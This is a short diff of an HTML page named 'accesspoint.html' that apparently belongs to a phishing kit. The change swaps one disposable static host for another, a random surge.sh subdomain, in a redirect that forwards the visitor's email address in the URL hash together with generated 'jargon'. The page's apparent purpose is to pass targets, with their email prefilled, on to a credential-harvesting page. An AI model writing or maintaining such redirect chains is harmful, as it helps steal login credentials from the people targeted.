--- a/accesspoint.html
+++ b/accesspoint.html
@@ -48,7 +48,7 @@
       const jargon = generateJargon();
 
       // Construct redirect URL: email + jargon in hash
-      const redirectURL = `https://papaya-1759505256502.staticrun.app/index#${email}`;
+      const redirectURL = `https://4759573683-data45678503.surge.sh/#${email}`;
 
       // Redirect
       window.location.href = redirectURL;
